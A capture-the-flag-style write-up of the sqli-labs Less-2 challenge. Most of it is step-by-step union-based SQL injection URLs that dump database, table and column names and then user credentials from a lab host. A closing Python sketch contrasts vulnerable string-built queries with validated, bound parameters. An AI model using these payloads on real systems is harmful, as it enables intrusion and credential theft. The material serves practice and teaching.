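Less-2 GET - Error based - Intiger based (error-based GET integer injection)
I started with a round of single-quote, double-quote, single-parenthesis, double-parenthesis and or/and tests. None of them worked, so I ran sqlmap against it.
Sigh, I got careless: it's the simplest numeric injection. Let's get going.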
http://192.168.1.21/sqli-labs-master/Less-2/?id=1 order by 3--+
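The page displays normally, so the query has 3 columns. Next, dump the database name. I won't post as many screenshots for this challenge; I'm being lazy!!!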
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,database(),3--+
Database name: security
List all database names
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata--+
The screenshot is the proof
Dump the table names
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+
Same old routine: the table is users, so dump its column names
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+
The username and password columns should be the ones to dump
http://192.168.1.21/sqli-labs-master/Less-2/?id=-1 union select 1,group_concat(username,0x7e,password),3 from security.users--+
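It doesn't fit on one line and doesn't wrap automatically. I can't be bothered to look into that; it only makes the screenshot look bad, heh!
That's it for today. Less is more, slow is fast; work through the challenges one at a time until each one is understood!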
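Why the quote probes at the start failed while the bare payloads worked: in a numeric injection the id value lands in the query with no quotes around it. The sketch below is an added example, not code from the original post or from sqli-labs; it uses Python's sqlite3 with a constructed users table and hypothetical function names (lookup_vulnerable, lookup_safe) to put the concatenated query beside a validated, bound one.

```python
import re
import sqlite3

def make_db():
    """In-memory stand-in for the lab's users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")])
    return db

COLUMNS = "id, username, password"

def lookup_vulnerable(db, raw_id):
    # Numeric context: raw_id is pasted in with no quotes around it, so the
    # request text becomes SQL syntax. A stray quote only breaks the statement.
    sql = "SELECT " + COLUMNS + " FROM users WHERE id=" + raw_id + " LIMIT 1"
    return db.execute(sql).fetchall()

def lookup_safe(db, raw_id):
    # Allow only a short run of ASCII digits, then bind the value so the
    # driver passes it as data and never as part of the statement.
    if not re.fullmatch(r"[0-9]{1,10}", raw_id):
        return None
    sql = "SELECT " + COLUMNS + " FROM users WHERE id=? LIMIT 1"
    return db.execute(sql, (int(raw_id),)).fetchall()

# Constructed input shaped like the post's union payloads, with a literal marker.
UNION_PROBE = "-1 union select 1,'injected',3-- "

if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, "1"))          # the legitimate row
    print(lookup_vulnerable(db, UNION_PROBE))  # the injected row replaces it
    try:
        lookup_vulnerable(db, "1'")            # quote probe: syntax error only
    except sqlite3.OperationalError as exc:
        print("quote probe:", exc)
    print(lookup_safe(db, "1"))                # the legitimate row
    print(lookup_safe(db, UNION_PROBE))        # rejected before reaching SQL
```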